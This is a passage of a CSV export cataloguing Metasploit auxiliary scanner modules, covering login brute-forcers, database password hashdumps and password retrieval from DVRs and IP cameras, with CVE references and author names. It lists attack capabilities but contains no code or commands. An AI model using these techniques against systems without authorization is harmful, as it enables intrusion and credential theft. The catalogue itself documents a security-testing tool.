Such CCTV DVR video surveillance deployments support remote viewing through Central Management Software (CMS) via the CMS Web Client, an IE ActiveX control hosted over HTTP, or through Win32 or mobile CMS client software. By default, remote authentication is handled over port 5920/TCP with video streaming over 5921/TCP. After successful authentication over 5920/TCP this module will then attempt to determine if the IE ActiveX control is listening on the default HTTP port (80/TCP).","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Justin Cacak" 1576,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb","auxiliary","scanner/misc/dvr_config_disclosure","auxiliary/scanner/misc/dvr_config_disclosure","Multiple DVR Manufacturers Configuration Disclosure",300,"This module takes advantage of an authentication bypass vulnerability in the web interface of multiple manufacturers' DVR systems, which allows retrieval of the device configuration.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-1391, URL-http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html","Alejandro Ramos, juan vazquez " 1577,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb","auxiliary","scanner/misc/ib_service_mgr_info","auxiliary/scanner/misc/ib_service_mgr_info","Borland InterBase Services Manager Information",300,"This module retrieves the version of the services manager, and the version and implementation of the InterBase server, from the InterBase Services Manager.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Adriano Lima , Ramon de C Valle " 1578,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/java_rmi_server.rb","auxiliary","scanner/misc/java_rmi_server","auxiliary/scanner/misc/java_rmi_server","Java RMI Server Insecure Endpoint Code Execution Scanner",300,"Detect Java RMI 
endpoints","Metasploit Framework License (BSD)","f","2011-10-15 00:00:00",,,"aggressive","t","MSF-java_rmi_server, URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html","hdm , mihi" 1579,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/oki_scanner.rb","auxiliary","scanner/misc/oki_scanner","auxiliary/scanner/misc/oki_scanner","OKI Printer Default Login Credential Scanner",300,"This module scans for OKI printers via SNMP, then tries to connect to found devices with vendor default administrator credentials via HTTP authentication. By default, OKI network printers use the last six digits of the MAC as admin password.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"antr6X " 1580,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb","auxiliary","scanner/misc/raysharp_dvr_passwords","auxiliary/scanner/misc/raysharp_dvr_passwords","Ray Sharp DVR Password Retriever",300,"This module takes advantage of a protocol design issue with the Ray Sharp based DVR systems. It is possible to retrieve the username and password through the TCP service running on port 9000. Other brands using this platform and exposing the same issue may include Swann, Lorex, Night Owl, Zmodo, URMET, and KGuard Security.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html","hdm , someluser" 1581,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/redis_server.rb","auxiliary","scanner/misc/redis_server","auxiliary/scanner/misc/redis_server","Redis-server Scanner",300,"This module scans for Redis server. By default Redis has no auth. If auth (password only) is used, it is then possible to execute a brute force attack on the server. 
This scanner will find open or password protected Redis servers and report back the server information","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"iallison " 1582,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb","auxiliary","scanner/misc/rosewill_rxs3211_passwords","auxiliary/scanner/misc/rosewill_rxs3211_passwords","Rosewill RXS-3211 IP Camera Password Retriever",300,"This module takes advantage of a protocol design issue with the Rosewill admin executable in order to retrieve passwords, allowing remote attackers to take administrative control over the device. Other similar IP Cameras such as Edimax, Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested. The protocol design issue also allows attackers to reset passwords on the device.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/","Ben Schmidt" 1583,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb","auxiliary","scanner/misc/sunrpc_portmapper","auxiliary/scanner/misc/sunrpc_portmapper","SunRPC Portmap Program Enumerator",300,"This module calls the target portmap service and enumerates all program entries and their running port numbers.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ietf.org/rfc/rfc1057.txt","tebo " 1584,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb","auxiliary","scanner/misc/zenworks_preboot_fileaccess","auxiliary/scanner/misc/zenworks_preboot_fileaccess","Novell ZENworks Configuration Management Preboot Service Remote File Access",300,"This module exploits a directory traversal in the ZENworks Configuration Management. 
The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-2215, OSVDB-80230, URL-http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975","Luigi Auriemma, juan vazquez " 1585,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mongodb/mongodb_login.rb","auxiliary","scanner/mongodb/mongodb_login","auxiliary/scanner/mongodb/mongodb_login","MongoDB Login Utility",300,"This module attempts to brute force authentication credentials for MongoDB. Note that, by default, MongoDB does not require authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.mongodb.org/display/DOCS/Implementing+Authentication+in+a+Driver, URL-http://www.mongodb.org/display/DOCS/Mongo+Wire+Protocol","Gregory Man " 1586,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/motorola/timbuktu_udp.rb","auxiliary","scanner/motorola/timbuktu_udp","auxiliary/scanner/motorola/timbuktu_udp","Motorola Timbuktu Service Detection",300,"This module simply sends a packet to the Motorola Timbuktu service for detection.","Metasploit Framework License (BSD)","f","2009-09-25 00:00:00",,,"aggressive","t",,"MC " 1587,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/msf/msf_rpc_login.rb","auxiliary","scanner/msf/msf_rpc_login","auxiliary/scanner/msf/msf_rpc_login","Metasploit RPC Interface Login Utility",300,"This module simply attempts to login to a Metasploit RPC interface using a specific user/pass.","Metasploit Framework License 
(BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1588,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/msf/msf_web_login.rb","auxiliary","scanner/msf/msf_web_login","auxiliary/scanner/msf/msf_web_login","Metasploit Web interface Login Utility",300,"This module simply attempts to login to a Metasploit web interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1589,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mssql/mssql_hashdump.rb","auxiliary","scanner/mssql/mssql_hashdump","auxiliary/scanner/mssql/mssql_hashdump","MSSQL Password Hashdump",300,"This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1590,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mssql/mssql_login.rb","auxiliary","scanner/mssql/mssql_login","auxiliary/scanner/mssql/mssql_login","MSSQL Login Utility",300,"This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0506","MC " 1591,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mssql/mssql_ping.rb","auxiliary","scanner/mssql/mssql_ping","auxiliary/scanner/mssql/mssql_ping","MSSQL Ping Utility",300,"This module simply queries the MSSQL instance for information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MC " 1592,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mssql/mssql_schemadump.rb","auxiliary","scanner/mssql/mssql_schemadump","auxiliary/scanner/mssql/mssql_schemadump","MSSQL Schema Dump",300,"This module attempts to extract the 
schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master,model,msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1593,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb","auxiliary","scanner/mysql/mysql_authbypass_hashdump","auxiliary/scanner/mysql/mysql_authbypass_hashdump","MySQL Authentication Bypass Password Dump",300,"This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes ares stored as loot for later cracking.","Metasploit Framework License (BSD)","f","2012-06-09 00:00:00",,,"aggressive","t","CVE-2012-2122, OSVDB-82804, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql","jcran , theLightCosine " 1594,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_file_enum.rb","auxiliary","scanner/mysql/mysql_file_enum","auxiliary/scanner/mysql/mysql_file_enum","MYSQL File/Directory Enumerator",300,"Enumerate files and directories using the MySQL load_file feature, for more information see the URL in the references.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html, URL-http://www.digininja.org/projects/mysql_file_enum.php","Robin Wood " 1595,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_hashdump.rb","auxiliary","scanner/mysql/mysql_hashdump","auxiliary/scanner/mysql/mysql_hashdump","MYSQL Password Hashdump",300,"This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.","Metasploit Framework License 
(BSD)","f",,,,"aggressive","t",,"theLightCosine " 1596,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_login.rb","auxiliary","scanner/mysql/mysql_login","auxiliary/scanner/mysql/mysql_login","MySQL Login Utility",300,"This module simply queries the MySQL instance for a specific user/pass (default is root with blank).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Bernardo Damele A. G. " 1597,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_schemadump.rb","auxiliary","scanner/mysql/mysql_schemadump","auxiliary/scanner/mysql/mysql_schemadump","MYSQL Schema Dump",300,"This module extracts the schema information from a MySQL DB server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1598,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_version.rb","auxiliary","scanner/mysql/mysql_version","auxiliary/scanner/mysql/mysql_version","MySQL Server Version Enumeration",300,"Enumerates the version of MySQL servers","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1599,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb","auxiliary","scanner/natpmp/natpmp_portscan","auxiliary/scanner/natpmp/natpmp_portscan","NAT-PMP External Port Scanner",300,"Scan NAT devices for their external listening ports using NAT-PMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Jon Hart " 1600,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb","auxiliary","scanner/nessus/nessus_ntp_login","auxiliary/scanner/nessus/nessus_ntp_login","Nessus NTP Login Utility",300,"This module attempts to authenticate to a Nessus NTP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1601,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb","auxiliary","scanner/nessus/nessus_xmlrpc_login","auxiliary/scanner/nessus/nessus_xmlrpc_login","Nessus XMLRPC Interface Login Utility",300,"This module simply attempts to login to a Nessus XMLRPC interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1602,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb","auxiliary","scanner/nessus/nessus_xmlrpc_ping","auxiliary/scanner/nessus/nessus_xmlrpc_ping","Nessus XMLRPC Interface Ping Utility",300,"This module simply attempts to find and check for Nessus XMLRPC interface.'","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1603,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/netbios/nbname.rb","auxiliary","scanner/netbios/nbname","auxiliary/scanner/netbios/nbname","NetBIOS Information Discovery",300,"Discover host information through NetBIOS","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1604,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/netbios/nbname_probe.rb","auxiliary","scanner/netbios/nbname_probe","auxiliary/scanner/netbios/nbname_probe","NetBIOS Information Discovery Prober",300,"Discover host information using sequential NetBIOS Probes","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , todb " 1605,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb","auxiliary","scanner/nexpose/nexpose_api_login","auxiliary/scanner/nexpose/nexpose_api_login","NeXpose API Interface Login Utility",300,"This module simply attempts to login to a NeXpose API interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1606,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nfs/nfsmount.rb","auxiliary","scanner/nfs/nfsmount","auxiliary/scanner/nfs/nfsmount","NFS Mount Scanner",300,"This module scans NFS mounts and their permissions.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0170, URL-http://www.ietf.org/rfc/rfc1094.txt","tebo " 1607,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ntp/ntp_monlist.rb","auxiliary","scanner/ntp/ntp_monlist","auxiliary/scanner/ntp/ntp_monlist","NTP Monitor List Scanner",300,"Obtain the list of recent clients from an NTP server","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1608,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ntp/ntp_readvar.rb","auxiliary","scanner/ntp/ntp_readvar","auxiliary/scanner/ntp/ntp_readvar","NTP Clock Variables Disclosure",300,"This module reads the system internal NTP variables. These variables contain potentially sensitive information, such as the NTP software version, operating system version, peers, and more.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure","Ewerson Guimaraes(Crash) " 1609,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb","auxiliary","scanner/openvas/openvas_gsad_login","auxiliary/scanner/openvas/openvas_gsad_login","OpenVAS gsad Web interface Login Utility",300,"This module simply attempts to login to a OpenVAS gsad interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1610,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/openvas/openvas_omp_login.rb","auxiliary","scanner/openvas/openvas_omp_login","auxiliary/scanner/openvas/openvas_omp_login","OpenVAS OMP Login Utility",300,"This module attempts to authenticate to an OpenVAS OMP 
service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1611,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/openvas/openvas_otp_login.rb","auxiliary","scanner/openvas/openvas_otp_login","auxiliary/scanner/openvas/openvas_otp_login","OpenVAS OTP Login Utility",300,"This module attempts to authenticate to an OpenVAS OTP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1612,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/emc_sid.rb","auxiliary","scanner/oracle/emc_sid","auxiliary/scanner/oracle/emc_sid","Oracle Enterprise Manager Control SID Discovery",300,"This module makes a request to the Oracle Enterprise Manager Control Console in an attempt to discover the SID.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf","MC " 1613,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/isqlplus_login.rb","auxiliary","scanner/oracle/isqlplus_login","auxiliary/scanner/oracle/isqlplus_login","Oracle iSQL*Plus Login Utility",300,"This module attempts to authenticate against an Oracle ISQL*Plus administration web site using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE. This module does not require a valid SID, but if one is defined, it will be used. Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. 
This module will attempt to fingerprint the version and automatically select the correct POST request.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://carnal0wnage.attackresearch.com","CG , todb " 1614,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb","auxiliary","scanner/oracle/isqlplus_sidbrute","auxiliary/scanner/oracle/isqlplus_sidbrute","Oracle isqlplus SID Check",300,"This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus login pages. It does this by testing Oracle error responses returned in the HTTP response. Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error. Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to fingerprint the version and automatically select the correct POST request.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://carnal0wnage.attackresearch.com","CG , todb " 1615,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/oracle_hashdump.rb","auxiliary","scanner/oracle/oracle_hashdump","auxiliary/scanner/oracle/oracle_hashdump","Oracle Password Hashdump",300,"This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. 
These are then stored as loot for later cracking.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1616,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/oracle_login.rb","auxiliary","scanner/oracle/oracle_login","auxiliary/scanner/oracle/oracle_login","Oracle RDBMS Login Utility",300,"This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, URL-http://nmap.org/nsedoc/scripts/oracle-brute.html, URL-http://www.oracle.com/us/products/database/index.html","Patrik Karlsson , todb " 1617,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/sid_brute.rb","auxiliary","scanner/oracle/sid_brute","auxiliary/scanner/oracle/sid_brute","Oracle TNS Listener SID Bruteforce",300,"This module queries the TNS listner for a valid Oracle database instance name (also known as a SID). Any response other than a ""reject"" will be considered a success. If a specific SID is provided, that SID will be attempted. Otherwise, SIDs read from the named file will be attempted in sequence instead.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"todb " 1618,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/sid_enum.rb","auxiliary","scanner/oracle/sid_enum","auxiliary/scanner/oracle/sid_enum","Oracle TNS Listener SID Enumeration",300,"This module simply queries the TNS listner for the Oracle SID. 
With Oracle 9.2.0.8 and above the listener will be protected and the SID will have to be bruteforced or guessed.","Metasploit Framework License (BSD)","f","2009-01-07 00:00:00",,,"aggressive","t",,"CG , MC " 1619,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/spy_sid.rb","auxiliary","scanner/oracle/spy_sid","auxiliary/scanner/oracle/spy_sid","Oracle Application Server Spy Servlet SID Enumeration",300,"This module makes a request to the Oracle Application Server in an attempt to discover the SID.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf","MC " 1620,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/tnslsnr_version.rb","auxiliary","scanner/oracle/tnslsnr_version","auxiliary/scanner/oracle/tnslsnr_version","Oracle TNS Listener Service Version Query",300,"This module simply queries the tnslsnr service for the Oracle build.","Metasploit Framework License (BSD)","f","2009-01-07 00:00:00",,,"aggressive","t",,"CG " 1621,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/xdb_sid.rb","auxiliary","scanner/oracle/xdb_sid","auxiliary/scanner/oracle/xdb_sid","Oracle XML DB SID Discovery",300,"This module simply makes a authenticated request to retrieve the sid from the Oracle XML DB httpd server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf","MC " 1622,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb","auxiliary","scanner/oracle/xdb_sid_brute","auxiliary/scanner/oracle/xdb_sid_brute","Oracle XML DB SID Discovery via Brute Force",300,"This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan's default oracle password list.","Metasploit Framework License 
(BSD)","f",,,,"aggressive","t","URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf, URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv","nebulus" 1623,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb","auxiliary","scanner/pcanywhere/pcanywhere_login","auxiliary/scanner/pcanywhere/pcanywhere_login","PcAnywhere Login Scanner",300,"This module will test pcAnywhere logins on a range of machines and report successful logins.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","theLightCosine " 1624,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb","auxiliary","scanner/pcanywhere/pcanywhere_tcp","auxiliary/scanner/pcanywhere/pcanywhere_tcp","PcAnywhere TCP Service Discovery",300,"Discover active pcAnywhere services through TCP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1625,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb","auxiliary","scanner/pcanywhere/pcanywhere_udp","auxiliary/scanner/pcanywhere/pcanywhere_udp","PcAnywhere UDP Service Discovery",300,"Discover active pcAnywhere services through UDP","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.unixwiz.net/tools/pcascan.txt","hdm " 1626,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pop3/pop3_login.rb","auxiliary","scanner/pop3/pop3_login","auxiliary/scanner/pop3/pop3_login","POP3 Login Utility",300,"This module attempts to authenticate to an POP3 service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ietf.org/rfc/rfc1734.txt, URL-http://www.ietf.org/rfc/rfc1939.txt","==[ Alligator Security Team ]==, Heyder Andrade " 1627,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pop3/pop3_version.rb","auxiliary","scanner/pop3/pop3_version","auxiliary/scanner/pop3/pop3_version","POP3 Banner Grabber",300,"POP3 Banner Grabber","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1628,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/ack.rb","auxiliary","scanner/portscan/ack","auxiliary/scanner/portscan/ack","TCP ACK Firewall Scanner",300,"Map out firewall rulesets with a raw ACK scan. Any unfiltered ports found means a stateful firewall is not in place for them.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1629,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/ftpbounce.rb","auxiliary","scanner/portscan/ftpbounce","auxiliary/scanner/portscan/ftpbounce","FTP Bounce Port Scanner",300,"Enumerate TCP services via the FTP bounce PORT/LIST method, which can still come in handy every once in a while (I know of a server that still allows this just fine...).","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1630,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/syn.rb","auxiliary","scanner/portscan/syn","auxiliary/scanner/portscan/syn","TCP SYN Port Scanner",300,"Enumerate open TCP services using a raw SYN scan.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1631,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb","auxiliary","scanner/portscan/tcp","auxiliary/scanner/portscan/tcp","TCP Port Scanner",300,"Enumerate open TCP services","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , kris katterjohn " 1632,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/xmas.rb","auxiliary","scanner/portscan/xmas","auxiliary/scanner/portscan/xmas","TCP ""XMas"" Port 
Scanner",300,"Enumerate open|filtered TCP services using a raw ""XMas"" scan; this sends probes containing the FIN, PSH and URG flags.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1633,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb","auxiliary","scanner/postgres/postgres_dbname_flag_injection","auxiliary/scanner/postgres/postgres_dbname_flag_injection","PostgreSQL Database Name Command Line Flag Injection",300,"This module can identify PostgreSQL 9.0, 9.1, and 9.2 servers that are vulnerable to command-line flag injection through CVE-2013-1899. This can lead to denial of service, privilege escalation, or even arbitrary code execution.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-1899, URL-http://www.postgresql.org/support/security/faq/2013-04-04/","hdm " 1634,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_hashdump.rb","auxiliary","scanner/postgres/postgres_hashdump","auxiliary/scanner/postgres/postgres_hashdump","Postgres Password Hashdump",300,"This module extracts the usernames and encrypted password hashes from a Postgres server and stores them for later cracking.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1635,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_login.rb","auxiliary","scanner/postgres/postgres_login","auxiliary/scanner/postgres/postgres_login","PostgreSQL Login Utility",300,"This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, URL-http://www.postgresql.org","todb " 1636,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_schemadump.rb","auxiliary","scanner/postgres/postgres_schemadump","auxiliary/scanner/postgres/postgres_schemadump","Postgres Schema Dump",300,"This module extracts the schema information from a Postgres server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1637,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_version.rb","auxiliary","scanner/postgres/postgres_version","auxiliary/scanner/postgres/postgres_version","PostgreSQL Version Probe",300,"Enumerates the verion of PostgreSQL servers.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.postgresql.org","todb " 1638,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rdp/ms12_020_check.rb","auxiliary","scanner/rdp/ms12_020_check","auxiliary/scanner/rdp/ms12_020_check","MS12-020 Microsoft Remote Desktop Checker",300,"This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-0002, EDB-18606, MSB-MS12-020, URL-http://technet.microsoft.com/en-us/security/bulletin/ms12-020, URL-https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse","Brandon McCann @zeknox , Royce Davis @R3dy_ " 1639,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rogue/rogue_recv.rb","auxiliary","scanner/rogue/rogue_recv","auxiliary/scanner/rogue/rogue_recv","Rogue Gateway Detection: Receiver",300,"This module listens for replies to the requests sent by the rogue_send module. 
